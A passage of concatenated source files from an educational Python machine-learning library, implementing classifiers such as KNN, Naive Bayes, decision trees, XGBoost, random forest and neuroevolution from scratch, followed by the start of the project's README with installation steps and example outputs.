LassoRegression from .regression import RidgeRegression, PolynomialRidgeRegression, ElasticNet from .logistic_regression import LogisticRegression from .multi_class_lda import MultiClassLDA from .naive_bayes import NaiveBayes from .perceptron import Perceptron from .random_forest import RandomForest from .support_vector_machine import SupportVectorMachine from .xgboost import XGBoost from .neuroevolution import Neuroevolution from .particle_swarm_optimization import ParticleSwarmOptimizedNN File: mlfromscratch/supervised_learning/k_nearest_neighbors.py from __future__ import print_function, division import numpy as np from mlfromscratch.utils import euclidean_distance class KNN(): """ K Nearest Neighbors classifier. 
Parameters: ----------- k: int The number of closest neighbors that will determine the class of the sample that we wish to predict. """ def __init__(self, k=5): self.k = k def _vote(self, neighbor_labels): """ Return the most common class among the neighbor samples """ counts = np.bincount(neighbor_labels.astype('int')) return counts.argmax() def predict(self, X_test, X_train, y_train): y_pred = np.empty(X_test.shape[0]) # Determine the class of each sample for i, test_sample in enumerate(X_test): # Sort the training samples by their distance to the test sample and get the K nearest idx = np.argsort([euclidean_distance(test_sample, x) for x in X_train])[:self.k] # Extract the labels of the K nearest neighboring training samples k_nearest_neighbors = np.array([y_train[i] for i in idx]) # Label sample as the most common class label y_pred[i] = self._vote(k_nearest_neighbors) return y_pred File: mlfromscratch/supervised_learning/naive_bayes.py from __future__ import division, print_function import numpy as np import math from mlfromscratch.utils import train_test_split, normalize from mlfromscratch.utils import Plot, accuracy_score class NaiveBayes(): """The Gaussian Naive Bayes classifier. """ def fit(self, X, y): self.X, self.y = X, y self.classes = np.unique(y) self.parameters = [] # Calculate the mean and variance of each feature for each class for i, c in enumerate(self.classes): # Only select the rows where the label equals the given class X_where_c = X[np.where(y == c)] self.parameters.append([]) # Add the mean and variance for each feature (column) for col in X_where_c.T: parameters = {"mean": col.mean(), "var": col.var()} self.parameters[i].append(parameters) def _calculate_likelihood(self, mean, var, x): """ Gaussian likelihood of the data x given mean and var """ eps = 1e-4 # Added in denominator to prevent division by zero coeff = 1.0 / math.sqrt(2.0 * math.pi * var + eps) exponent = math.exp(-(math.pow(x - mean, 2) / (2 * var + eps))) return coeff * exponent def _calculate_prior(self, c): """ Calculate the prior of class c (samples where class == c / total number of samples)""" frequency = np.mean(self.y == c) return frequency def _classify(self, sample): """ Classification using Bayes Rule P(Y|X) = P(X|Y)*P(Y)/P(X), or Posterior = Likelihood * Prior / Scaling Factor P(Y|X) - The posterior is the probability that sample x is of class y given the feature values of x being distributed according to distribution of y and the prior. P(X|Y) - Likelihood of data X given class distribution Y. Gaussian distribution (given by _calculate_likelihood) P(Y) - Prior (given by _calculate_prior) P(X) - Scales the posterior to make it a proper probability distribution. This term is ignored in this implementation since it doesn't affect which class distribution the sample is most likely to belong to. 
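        As a sketch, the quantity actually compared across classes is

            P(Y = c) * prod_i N(x_i | mean_{c,i}, var_{c,i})

        i.e. the prior for class c times the product of the per-feature
        Gaussian likelihoods of the sample's feature values.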
Classifies the sample as the class that results in the largest P(Y|X) (posterior) """ posteriors = [] # Go through list of classes for i, c in enumerate(self.classes): # Initialize posterior as prior posterior = self._calculate_prior(c) # Naive assumption (independence): # P(x1,x2,x3|Y) = P(x1|Y)*P(x2|Y)*P(x3|Y) # Posterior is product of prior and likelihoods (ignoring scaling factor) for feature_value, params in zip(sample, self.parameters[i]): # Likelihood of feature value given distribution of feature values given y likelihood = self._calculate_likelihood(params["mean"], params["var"], feature_value) posterior *= likelihood posteriors.append(posterior) # Return the class with the largest posterior probability return self.classes[np.argmax(posteriors)] def predict(self, X): """ Predict the class labels of the samples in X """ y_pred = [self._classify(sample) for sample in X] return y_pred File: mlfromscratch/supervised_learning/decision_tree.py from __future__ import division, print_function import numpy as np from mlfromscratch.utils import divide_on_feature, train_test_split, standardize, mean_squared_error from mlfromscratch.utils import calculate_entropy, accuracy_score, calculate_variance class DecisionNode(): """Class that represents a decision node or leaf in the decision tree Parameters: ----------- feature_i: int Feature index which we want to use as the threshold measure. threshold: float The value that we will compare feature values at feature_i against to determine the prediction. value: float The class prediction if classification tree, or float value if regression tree. true_branch: DecisionNode Next decision node for samples where features value met the threshold. false_branch: DecisionNode Next decision node for samples where features value did not meet the threshold. """ def __init__(self, feature_i=None, threshold=None, value=None, true_branch=None, false_branch=None): self.feature_i = feature_i # Index for the feature that is tested self.threshold = threshold # Threshold value for feature self.value = value # Value if the node is a leaf in the tree self.true_branch = true_branch # 'Left' subtree self.false_branch = false_branch # 'Right' subtree # Super class of RegressionTree and ClassificationTree class DecisionTree(object): """Super class of RegressionTree and ClassificationTree. Parameters: ----------- min_samples_split: int The minimum number of samples needed to make a split when building a tree. min_impurity: float The minimum impurity required to split the tree further. max_depth: int The maximum depth of a tree. loss: function Loss function that is used for Gradient Boosting models to calculate impurity. """ def __init__(self, min_samples_split=2, min_impurity=1e-7, max_depth=float("inf"), loss=None): self.root = None # Root node in dec. tree # Minimum n of samples to justify split self.min_samples_split = min_samples_split # The minimum impurity to justify split self.min_impurity = min_impurity # The maximum depth to grow the tree to self.max_depth = max_depth # Function to calculate impurity (classif.=>info gain, regr=>variance reduct.) 
self._impurity_calculation = None # Function to determine prediction of y at leaf self._leaf_value_calculation = None # If y is one-hot encoded (multi-dim) or not (one-dim) self.one_dim = None # If Gradient Boost self.loss = loss def fit(self, X, y, loss=None): """ Build decision tree """ self.one_dim = len(np.shape(y)) == 1 self.root = self._build_tree(X, y) self.loss=None def _build_tree(self, X, y, current_depth=0): """ Recursive method which builds out the decision tree and splits X and respective y on the feature of X which (based on impurity) best separates the data""" largest_impurity = 0 best_criteria = None # Feature index and threshold best_sets = None # Subsets of the data # Check if expansion of y is needed if len(np.shape(y)) == 1: y = np.expand_dims(y, axis=1) # Add y as last column of X Xy = np.concatenate((X, y), axis=1) n_samples, n_features = np.shape(X) if n_samples >= self.min_samples_split and current_depth <= self.max_depth: # Calculate the impurity for each feature for feature_i in range(n_features): # All values of feature_i feature_values = np.expand_dims(X[:, feature_i], axis=1) unique_values = np.unique(feature_values) # Iterate through all unique values of feature column i and # calculate the impurity for threshold in unique_values: # Divide X and y depending on if the feature value of X at index feature_i # meets the threshold Xy1, Xy2 = divide_on_feature(Xy, feature_i, threshold) if len(Xy1) > 0 and len(Xy2) > 0: # Select the y-values of the two sets y1 = Xy1[:, n_features:] y2 = Xy2[:, n_features:] # Calculate impurity impurity = self._impurity_calculation(y, y1, y2) # If this threshold resulted in a higher information gain than previously # recorded save the threshold value and the feature # index if impurity > largest_impurity: largest_impurity = impurity best_criteria = {"feature_i": feature_i, "threshold": threshold} best_sets = { "leftX": Xy1[:, :n_features], # X of left subtree "lefty": Xy1[:, n_features:], # y of left subtree "rightX": Xy2[:, :n_features], # X of right subtree "righty": Xy2[:, n_features:] # y of right subtree } if largest_impurity > self.min_impurity: # Build subtrees for the right and left branches true_branch = self._build_tree(best_sets["leftX"], best_sets["lefty"], current_depth + 1) false_branch = self._build_tree(best_sets["rightX"], best_sets["righty"], current_depth + 1) return DecisionNode(feature_i=best_criteria["feature_i"], threshold=best_criteria[ "threshold"], true_branch=true_branch, false_branch=false_branch) # We're at leaf => determine value leaf_value = self._leaf_value_calculation(y) return DecisionNode(value=leaf_value) def predict_value(self, x, tree=None): """ Do a recursive search down the tree and make a prediction of the data sample by the value of the leaf that we end up at """ if tree is None: tree = self.root # If we have a value (i.e we're at a leaf) => return value as the prediction if tree.value is not None: return tree.value # Choose the feature that we will test feature_value = x[tree.feature_i] # Determine if we will follow left or right branch branch = tree.false_branch if isinstance(feature_value, int) or isinstance(feature_value, float): if feature_value >= tree.threshold: branch = tree.true_branch elif feature_value == tree.threshold: branch = tree.true_branch # Test subtree return self.predict_value(x, branch) def predict(self, X): """ Classify samples one by one and return the set of labels """ y_pred = [self.predict_value(sample) for sample in X] return y_pred def print_tree(self, tree=None, 
indent=" "): """ Recursively print the decision tree """ if not tree: tree = self.root # If we're at leaf => print the label if tree.value is not None: print (tree.value) # Go deeper down the tree else: # Print test print ("%s:%s? " % (tree.feature_i, tree.threshold)) # Print the true scenario print ("%sT->" % (indent), end="") self.print_tree(tree.true_branch, indent + indent) # Print the false scenario print ("%sF->" % (indent), end="") self.print_tree(tree.false_branch, indent + indent) class XGBoostRegressionTree(DecisionTree): """ Regression tree for XGBoost - Reference - http://xgboost.readthedocs.io/en/latest/model.html """ def _split(self, y): """ y contains y_true in left half of the middle column and y_pred in the right half. Split and return the two matrices """ col = int(np.shape(y)[1]/2) y, y_pred = y[:, :col], y[:, col:] return y, y_pred def _gain(self, y, y_pred): nominator = np.power((y * self.loss.gradient(y, y_pred)).sum(), 2) denominator = self.loss.hess(y, y_pred).sum() return 0.5 * (nominator / denominator) def _gain_by_taylor(self, y, y1, y2): # Split y, y_pred = self._split(y) y1, y1_pred = self._split(y1) y2, y2_pred = self._split(y2) true_gain = self._gain(y1, y1_pred) false_gain = self._gain(y2, y2_pred) gain = self._gain(y, y_pred) return true_gain + false_gain - gain def _approximate_update(self, y): # y split into y, y_pred y, y_pred = self._split(y) # Newton's Method gradient = np.sum(y * self.loss.gradient(y, y_pred), axis=0) hessian = np.sum(self.loss.hess(y, y_pred), axis=0) update_approximation = gradient / hessian return update_approximation def fit(self, X, y): self._impurity_calculation = self._gain_by_taylor self._leaf_value_calculation = self._approximate_update super(XGBoostRegressionTree, self).fit(X, y) class RegressionTree(DecisionTree): def _calculate_variance_reduction(self, y, y1, y2): var_tot = calculate_variance(y) var_1 = calculate_variance(y1) var_2 = calculate_variance(y2) frac_1 = len(y1) / len(y) frac_2 = len(y2) / len(y) # Calculate the variance reduction variance_reduction = var_tot - (frac_1 * var_1 + frac_2 * var_2) return sum(variance_reduction) def _mean_of_y(self, y): value = np.mean(y, axis=0) return value if len(value) > 1 else value[0] def fit(self, X, y): self._impurity_calculation = self._calculate_variance_reduction self._leaf_value_calculation = self._mean_of_y super(RegressionTree, self).fit(X, y) class ClassificationTree(DecisionTree): def _calculate_information_gain(self, y, y1, y2): # Calculate information gain p = len(y1) / len(y) entropy = calculate_entropy(y) info_gain = entropy - p * \ calculate_entropy(y1) - (1 - p) * \ calculate_entropy(y2) return info_gain def _majority_vote(self, y): most_common = None max_count = 0 for label in np.unique(y): # Count number of occurences of samples with label count = len(y[y == label]) if count > max_count: most_common = label max_count = count return most_common def fit(self, X, y): self._impurity_calculation = self._calculate_information_gain self._leaf_value_calculation = self._majority_vote super(ClassificationTree, self).fit(X, y) File: mlfromscratch/supervised_learning/bayesian_regression.py from __future__ import print_function, division import numpy as np from scipy.stats import chi2, multivariate_normal from mlfromscratch.utils import mean_squared_error, train_test_split, polynomial_features class BayesianRegression(object): """Bayesian regression model. 
If poly_degree is specified the features will be transformed to with a polynomial basis function, which allows for polynomial regression. Assumes Normal prior and likelihood for the weights and scaled inverse chi-squared prior and likelihood for the variance of the weights. Parameters: ----------- n_draws: float The number of simulated draws from the posterior of the parameters. mu0: array The mean values of the prior Normal distribution of the parameters. omega0: array The precision matrix of the prior Normal distribution of the parameters. nu0: float The degrees of freedom of the prior scaled inverse chi squared distribution. sigma_sq0: float The scale parameter of the prior scaled inverse chi squared distribution. poly_degree: int The polynomial degree that the features should be transformed to. Allows for polynomial regression. cred_int: float The credible interval (ETI in this impl.). 95 => 95% credible interval of the posterior of the parameters. Reference: https://github.com/mattiasvillani/BayesLearnCourse/raw/master/Slides/BayesLearnL5.pdf """ def __init__(self, n_draws, mu0, omega0, nu0, sigma_sq0, poly_degree=0, cred_int=95): self.w = None self.n_draws = n_draws self.poly_degree = poly_degree self.cred_int = cred_int # Prior parameters self.mu0 = mu0 self.omega0 = omega0 self.nu0 = nu0 self.sigma_sq0 = sigma_sq0 # Allows for simulation from the scaled inverse chi squared # distribution. Assumes the variance is distributed according to # this distribution. # Reference: # https://en.wikipedia.org/wiki/Scaled_inverse_chi-squared_distribution def _draw_scaled_inv_chi_sq(self, n, df, scale): X = chi2.rvs(size=n, df=df) sigma_sq = df * scale / X return sigma_sq def fit(self, X, y): # If polynomial transformation if self.poly_degree: X = polynomial_features(X, degree=self.poly_degree) n_samples, n_features = np.shape(X) X_X = X.T.dot(X) # Least squares approximate of beta beta_hat = np.linalg.pinv(X_X).dot(X.T).dot(y) # The posterior parameters can be determined analytically since we assume # conjugate priors for the likelihoods. 
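        # A sketch of the conjugate updates computed below (X_X = X'X):
        #   mu_n       = pinv(X_X + omega0) (X_X beta_hat + omega0 mu0)
        #   omega_n    = X_X + omega0
        #   nu_n       = nu0 + n_samples
        #   sigma_sq_n = (nu0 sigma_sq0 + y'y + mu0' omega0 mu0
        #                 - mu_n' omega_n mu_n) / nu_n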
# Normal prior / likelihood => Normal posterior mu_n = np.linalg.pinv(X_X + self.omega0).dot(X_X.dot(beta_hat)+self.omega0.dot(self.mu0)) omega_n = X_X + self.omega0 # Scaled inverse chi-squared prior / likelihood => Scaled inverse chi-squared posterior nu_n = self.nu0 + n_samples sigma_sq_n = (1.0/nu_n)*(self.nu0*self.sigma_sq0 + \ (y.T.dot(y) + self.mu0.T.dot(self.omega0).dot(self.mu0) - mu_n.T.dot(omega_n.dot(mu_n)))) # Simulate parameter values for n_draws beta_draws = np.empty((self.n_draws, n_features)) for i in range(self.n_draws): sigma_sq = self._draw_scaled_inv_chi_sq(n=1, df=nu_n, scale=sigma_sq_n) beta = multivariate_normal.rvs(size=1, mean=mu_n[:,0], cov=sigma_sq*np.linalg.pinv(omega_n)) # Save parameter draws beta_draws[i, :] = beta # Select the mean of the simulated variables as the ones used to make predictions self.w = np.mean(beta_draws, axis=0) # Lower and upper boundary of the credible interval l_eti = 50 - self.cred_int/2 u_eti = 50 + self.cred_int/2 self.eti = np.array([[np.percentile(beta_draws[:,i], q=l_eti), np.percentile(beta_draws[:,i], q=u_eti)] \ for i in range(n_features)]) def predict(self, X, eti=False): # If polynomial transformation if self.poly_degree: X = polynomial_features(X, degree=self.poly_degree) y_pred = X.dot(self.w) # If the lower and upper boundaries for the 95% # equal tail interval should be returned if eti: lower_w = self.eti[:, 0] upper_w = self.eti[:, 1] y_lower_pred = X.dot(lower_w) y_upper_pred = X.dot(upper_w) return y_pred, y_lower_pred, y_upper_pred return y_pred File: mlfromscratch/supervised_learning/logistic_regression.py from __future__ import print_function, division import numpy as np import math from mlfromscratch.utils import make_diagonal, Plot from mlfromscratch.deep_learning.activation_functions import Sigmoid class LogisticRegression(): """ Logistic Regression classifier. Parameters: ----------- learning_rate: float The step length that will be taken when following the negative gradient during training. gradient_descent: boolean True or false depending if gradient descent should be used when training. If false then we use batch optimization by least squares. 
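    Example (a minimal usage sketch; assumes numpy arrays `X_train`, `X_test`
    and binary labels `y_train` in {0, 1}):

        >>> clf = LogisticRegression(gradient_descent=True)
        >>> clf.fit(X_train, y_train)
        >>> y_pred = clf.predict(X_test)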
""" def __init__(self, learning_rate=.1, gradient_descent=True): self.param = None self.learning_rate = learning_rate self.gradient_descent = gradient_descent self.sigmoid = Sigmoid() def _initialize_parameters(self, X): n_features = np.shape(X)[1] # Initialize parameters between [-1/sqrt(N), 1/sqrt(N)] limit = 1 / math.sqrt(n_features) self.param = np.random.uniform(-limit, limit, (n_features,)) def fit(self, X, y, n_iterations=4000): self._initialize_parameters(X) # Tune parameters for n iterations for i in range(n_iterations): # Make a new prediction y_pred = self.sigmoid(X.dot(self.param)) if self.gradient_descent: # Move against the gradient of the loss function with # respect to the parameters to minimize the loss self.param -= self.learning_rate * -(y - y_pred).dot(X) else: # Make a diagonal matrix of the sigmoid gradient column vector diag_gradient = make_diagonal(self.sigmoid.gradient(X.dot(self.param))) # Batch opt: self.param = np.linalg.pinv(X.T.dot(diag_gradient).dot(X)).dot(X.T).dot(diag_gradient.dot(X).dot(self.param) + y - y_pred) def predict(self, X): y_pred = np.round(self.sigmoid(X.dot(self.param))).astype(int) return y_pred File: mlfromscratch/supervised_learning/xgboost.py from __future__ import division, print_function import numpy as np import progressbar from mlfromscratch.utils import train_test_split, standardize, to_categorical, normalize from mlfromscratch.utils import mean_squared_error, accuracy_score from mlfromscratch.supervised_learning import XGBoostRegressionTree from mlfromscratch.deep_learning.activation_functions import Sigmoid from mlfromscratch.utils.misc import bar_widgets from mlfromscratch.utils import Plot class LogisticLoss(): def __init__(self): sigmoid = Sigmoid() self.log_func = sigmoid self.log_grad = sigmoid.gradient def loss(self, y, y_pred): y_pred = np.clip(y_pred, 1e-15, 1 - 1e-15) p = self.log_func(y_pred) return y * np.log(p) + (1 - y) * np.log(1 - p) # gradient w.r.t y_pred def gradient(self, y, y_pred): p = self.log_func(y_pred) return -(y - p) # w.r.t y_pred def hess(self, y, y_pred): p = self.log_func(y_pred) return p * (1 - p) class XGBoost(object): """The XGBoost classifier. Reference: http://xgboost.readthedocs.io/en/latest/model.html Parameters: ----------- n_estimators: int The number of classification trees that are used. learning_rate: float The step length that will be taken when following the negative gradient during training. min_samples_split: int The minimum number of samples needed to make a split when building a tree. min_impurity: float The minimum impurity required to split the tree further. max_depth: int The maximum depth of a tree. 
""" def __init__(self, n_estimators=200, learning_rate=0.001, min_samples_split=2, min_impurity=1e-7, max_depth=2): self.n_estimators = n_estimators # Number of trees self.learning_rate = learning_rate # Step size for weight update self.min_samples_split = min_samples_split # The minimum n of sampels to justify split self.min_impurity = min_impurity # Minimum variance reduction to continue self.max_depth = max_depth # Maximum depth for tree self.bar = progressbar.ProgressBar(widgets=bar_widgets) # Log loss for classification self.loss = LogisticLoss() # Initialize regression trees self.trees = [] for _ in range(n_estimators): tree = XGBoostRegressionTree( min_samples_split=self.min_samples_split, min_impurity=min_impurity, max_depth=self.max_depth, loss=self.loss) self.trees.append(tree) def fit(self, X, y): y = to_categorical(y) y_pred = np.zeros(np.shape(y)) for i in self.bar(range(self.n_estimators)): tree = self.trees[i] y_and_pred = np.concatenate((y, y_pred), axis=1) tree.fit(X, y_and_pred) update_pred = tree.predict(X) y_pred -= np.multiply(self.learning_rate, update_pred) def predict(self, X): y_pred = None # Make predictions for tree in self.trees: # Estimate gradient and update prediction update_pred = tree.predict(X) if y_pred is None: y_pred = np.zeros_like(update_pred) y_pred -= np.multiply(self.learning_rate, update_pred) # Turn into probability distribution (Softmax) y_pred = np.exp(y_pred) / np.sum(np.exp(y_pred), axis=1, keepdims=True) # Set label to the value that maximizes probability y_pred = np.argmax(y_pred, axis=1) return y_pred File: mlfromscratch/supervised_learning/random_forest.py from __future__ import division, print_function import numpy as np import math import progressbar # Import helper functions from mlfromscratch.utils import divide_on_feature, train_test_split, get_random_subsets, normalize from mlfromscratch.utils import accuracy_score, calculate_entropy from mlfromscratch.unsupervised_learning import PCA from mlfromscratch.supervised_learning import ClassificationTree from mlfromscratch.utils.misc import bar_widgets from mlfromscratch.utils import Plot class RandomForest(): """Random Forest classifier. Uses a collection of classification trees that trains on random subsets of the data using a random subsets of the features. Parameters: ----------- n_estimators: int The number of classification trees that are used. max_features: int The maximum number of features that the classification trees are allowed to use. min_samples_split: int The minimum number of samples needed to make a split when building a tree. min_gain: float The minimum impurity required to split the tree further. max_depth: int The maximum depth of a tree. """ def __init__(self, n_estimators=100, max_features=None, min_samples_split=2, min_gain=0, max_depth=float("inf")): self.n_estimators = n_estimators # Number of trees self.max_features = max_features # Maxmimum number of features per tree self.min_samples_split = min_samples_split self.min_gain = min_gain # Minimum information gain req. 
to continue self.max_depth = max_depth # Maximum depth for tree self.progressbar = progressbar.ProgressBar(widgets=bar_widgets) # Initialize decision trees self.trees = [] for _ in range(n_estimators): self.trees.append( ClassificationTree( min_samples_split=self.min_samples_split, min_impurity=min_gain, max_depth=self.max_depth)) def fit(self, X, y): n_features = np.shape(X)[1] # If max_features have not been defined => select it as # sqrt(n_features) if not self.max_features: self.max_features = int(math.sqrt(n_features)) # Choose one random subset of the data for each tree subsets = get_random_subsets(X, y, self.n_estimators) for i in self.progressbar(range(self.n_estimators)): X_subset, y_subset = subsets[i] # Feature bagging (select random subsets of the features) idx = np.random.choice(range(n_features), size=self.max_features, replace=True) # Save the indices of the features for prediction self.trees[i].feature_indices = idx # Choose the features corresponding to the indices X_subset = X_subset[:, idx] # Fit the tree to the data self.trees[i].fit(X_subset, y_subset) def predict(self, X): y_preds = np.empty((X.shape[0], len(self.trees))) # Let each tree make a prediction on the data for i, tree in enumerate(self.trees): # Indices of the features that the tree has trained on idx = tree.feature_indices # Make a prediction based on those features prediction = tree.predict(X[:, idx]) y_preds[:, i] = prediction y_pred = [] # For each sample for sample_predictions in y_preds: # Select the most common class prediction y_pred.append(np.bincount(sample_predictions.astype('int')).argmax()) return y_pred File: mlfromscratch/supervised_learning/neuroevolution.py from __future__ import print_function, division import numpy as np import copy class Neuroevolution(): """ Evolutionary optimization of Neural Networks. Parameters: ----------- n_individuals: int The number of neural networks that are allowed in the population at a time. mutation_rate: float The probability that a weight will be mutated. model_builder: method A method which returns a user specified NeuralNetwork instance. 
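    Example (a minimal usage sketch; `build_model` is a hypothetical builder
    that takes `n_inputs`/`n_outputs` and returns a NeuralNetwork-style model
    exposing `layers` and `test_on_batch`; `X`, `y` are numpy arrays with `y`
    one-hot encoded):

        >>> evolver = Neuroevolution(population_size=100,
        ...                          mutation_rate=0.01,
        ...                          model_builder=build_model)
        >>> best_model = evolver.evolve(X, y, n_generations=50)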
""" def __init__(self, population_size, mutation_rate, model_builder): self.population_size = population_size self.mutation_rate = mutation_rate self.model_builder = model_builder def _build_model(self, id): """ Returns a new individual """ model = self.model_builder(n_inputs=self.X.shape[1], n_outputs=self.y.shape[1]) model.id = id model.fitness = 0 model.accuracy = 0 return model def _initialize_population(self): """ Initialization of the neural networks forming the population""" self.population = [] for _ in range(self.population_size): model = self._build_model(id=np.random.randint(1000)) self.population.append(model) def _mutate(self, individual, var=1): """ Add zero mean gaussian noise to the layer weights with probability mutation_rate """ for layer in individual.layers: if hasattr(layer, 'W'): # Mutation of weight with probability self.mutation_rate mutation_mask = np.random.binomial(1, p=self.mutation_rate, size=layer.W.shape) layer.W += np.random.normal(loc=0, scale=var, size=layer.W.shape) * mutation_mask mutation_mask = np.random.binomial(1, p=self.mutation_rate, size=layer.w0.shape) layer.w0 += np.random.normal(loc=0, scale=var, size=layer.w0.shape) * mutation_mask return individual def _inherit_weights(self, child, parent): """ Copies the weights from parent to child """ for i in range(len(child.layers)): if hasattr(child.layers[i], 'W'): # The child inherits both weights W and bias weights w0 child.layers[i].W = parent.layers[i].W.copy() child.layers[i].w0 = parent.layers[i].w0.copy() def _crossover(self, parent1, parent2): """ Performs crossover between the neurons in parent1 and parent2 to form offspring """ child1 = self._build_model(id=parent1.id+1) self._inherit_weights(child1, parent1) child2 = self._build_model(id=parent2.id+1) self._inherit_weights(child2, parent2) # Perform crossover for i in range(len(child1.layers)): if hasattr(child1.layers[i], 'W'): n_neurons = child1.layers[i].W.shape[1] # Perform crossover between the individuals' neuron weights cutoff = np.random.randint(0, n_neurons) child1.layers[i].W[:, cutoff:] = parent2.layers[i].W[:, cutoff:].copy() child1.layers[i].w0[:, cutoff:] = parent2.layers[i].w0[:, cutoff:].copy() child2.layers[i].W[:, cutoff:] = parent1.layers[i].W[:, cutoff:].copy() child2.layers[i].w0[:, cutoff:] = parent1.layers[i].w0[:, cutoff:].copy() return child1, child2 def _calculate_fitness(self): """ Evaluate the NNs on the test set to get fitness scores """ for individual in self.population: loss, acc = individual.test_on_batch(self.X, self.y) individual.fitness = 1 / (loss + 1e-8) individual.accuracy = acc def evolve(self, X, y, n_generations): """ Will evolve the population for n_generations based on dataset X and labels y""" self.X, self.y = X, y self._initialize_population() # The 40% highest fittest individuals will be selected for the next generation n_winners = int(self.population_size * 0.4) # The fittest 60% of the population will be selected as parents to form offspring n_parents = self.population_size - n_winners for epoch in range(n_generations): # Determine the fitness of the individuals in the population self._calculate_fitness() # Sort population by fitness sorted_i = np.argsort([model.fitness for model in self.population])[::-1] self.population = [self.population[i] for i in sorted_i] # Get the individual with the highest fitness fittest_individual = self.population[0] print ("[%d Best Individual - Fitness: %.5f, Accuracy: %.1f%%]" % (epoch, fittest_individual.fitness, float(100*fittest_individual.accuracy))) # The 
'winners' are selected for the next generation next_population = [self.population[i] for i in range(n_winners)] total_fitness = np.sum([model.fitness for model in self.population]) # The probability that an individual will be selected as a parent is proportionate to its fitness parent_probabilities = [model.fitness / total_fitness for model in self.population] # Select parents according to probabilities (without replacement to preserve diversity) parents = np.random.choice(self.population, size=n_parents, p=parent_probabilities, replace=False) for i in np.arange(0, len(parents), 2): # Perform crossover to produce offspring child1, child2 = self._crossover(parents[i], parents[i+1]) # Save mutated offspring for next population next_population += [self._mutate(child1), self._mutate(child2)] self.population = next_population return fittest_individual
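The `evolve` loop above ties the pieces together: fitness evaluation, fitness-proportional parent selection, single-point crossover and Gaussian weight mutation. Below is a minimal usage sketch, assuming the `mlfromscratch` package from this repository is installed and borrowing the scikit-learn digits dataset for illustration; the layer sizes and hyperparameters are illustrative choices, not the project's reference example (see `mlfromscratch/examples/neuroevolution.py` for that).

```py
from sklearn import datasets

from mlfromscratch.deep_learning import NeuralNetwork
from mlfromscratch.deep_learning.layers import Activation, Dense
from mlfromscratch.deep_learning.loss_functions import CrossEntropy
from mlfromscratch.deep_learning.optimizers import Adam
from mlfromscratch.supervised_learning import Neuroevolution
from mlfromscratch.utils import to_categorical


def model_builder(n_inputs, n_outputs):
    # Called once per individual; must return a NeuralNetwork whose Dense
    # layers expose W and w0, since mutation and crossover act on those.
    model = NeuralNetwork(optimizer=Adam(), loss=CrossEntropy)
    model.add(Dense(16, input_shape=(n_inputs,)))
    model.add(Activation('relu'))
    model.add(Dense(n_outputs))
    model.add(Activation('softmax'))
    return model


data = datasets.load_digits()
X = data.data / 16.0                           # scale pixel values to [0, 1]
y = to_categorical(data.target.astype('int'))  # one-hot labels (2-D, as evolve expects)

evolver = Neuroevolution(population_size=100,
                         mutation_rate=0.01,
                         model_builder=model_builder)
fittest = evolver.evolve(X, y, n_generations=500)
print('Best fitness: %.5f, accuracy: %.1f%%' % (fittest.fitness, 100 * fittest.accuracy))
```

Since `evolve` pairs parents off two at a time, pick a population size for which `population_size - int(0.4 * population_size)` is even (multiples of ten work); otherwise the crossover loop would index past the end of the parent list.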
# Machine Learning From Scratch ## About Python implementations of some of the fundamental Machine Learning models and algorithms from scratch. The purpose of this project is not to produce as optimized and computationally efficient algorithms as possible but rather to present the inner workings of them in a transparent and accessible way. ## Table of Contents - [Machine Learning From Scratch](#machine-learning-from-scratch) * [About](#about) * [Table of Contents](#table-of-contents) * [Installation](#installation) * [Examples](#examples) + [Polynomial Regression](#polynomial-regression) + [Classification With CNN](#classification-with-cnn) + [Density-Based Clustering](#density-based-clustering) + [Generating Handwritten Digits](#generating-handwritten-digits) + [Deep Reinforcement Learning](#deep-reinforcement-learning) + [Image Reconstruction With RBM](#image-reconstruction-with-rbm) + [Evolutionary Evolved Neural Network](#evolutionary-evolved-neural-network) + [Genetic Algorithm](#genetic-algorithm) + [Association Analysis](#association-analysis) * [Implementations](#implementations) + [Supervised Learning](#supervised-learning) + [Unsupervised Learning](#unsupervised-learning) + [Reinforcement Learning](#reinforcement-learning) + [Deep Learning](#deep-learning) * [Contact](#contact) ## Installation $ git clone https://github.com/eriklindernoren/ML-From-Scratch $ cd ML-From-Scratch $ python setup.py install ## Examples ### Polynomial Regression $ python mlfromscratch/examples/polynomial_regression.py <p align="center"> <img src="http://eriklindernoren.se/images/p_reg.gif" width="640"\> </p> <p align="center"> Figure: Training progress of a regularized polynomial regression model fitting <br> temperature data measured in Linköping, Sweden 2016. </p> ### Classification With CNN $ python mlfromscratch/examples/convolutional_neural_network.py +---------+ | ConvNet | +---------+ Input Shape: (1, 8, 8) +----------------------+------------+--------------+ | Layer Type | Parameters | Output Shape | +----------------------+------------+--------------+ | Conv2D | 160 | (16, 8, 8) | | Activation (ReLU) | 0 | (16, 8, 8) | | Dropout | 0 | (16, 8, 8) | | BatchNormalization | 2048 | (16, 8, 8) | | Conv2D | 4640 | (32, 8, 8) | | Activation (ReLU) | 0 | (32, 8, 8) | | Dropout | 0 | (32, 8, 8) | | BatchNormalization | 4096 | (32, 8, 8) | | Flatten | 0 | (2048,) | | Dense | 524544 | (256,) | | Activation (ReLU) | 0 | (256,) | | Dropout | 0 | (256,) | | BatchNormalization | 512 | (256,) | | Dense | 2570 | (10,) | | Activation (Softmax) | 0 | (10,) | +----------------------+------------+--------------+ Total Parameters: 538570 Training: 100% [------------------------------------------------------------------------] Time: 0:01:55 Accuracy: 0.987465181058 <p align="center"> <img src="http://eriklindernoren.se/images/mlfs_cnn1.png" width="640"> </p> <p align="center"> Figure: Classification of the digit dataset using CNN. </p> ### Density-Based Clustering $ python mlfromscratch/examples/dbscan.py <p align="center"> <img src="http://eriklindernoren.se/images/mlfs_dbscan.png" width="640"> </p> <p align="center"> Figure: Clustering of the moons dataset using DBSCAN. 
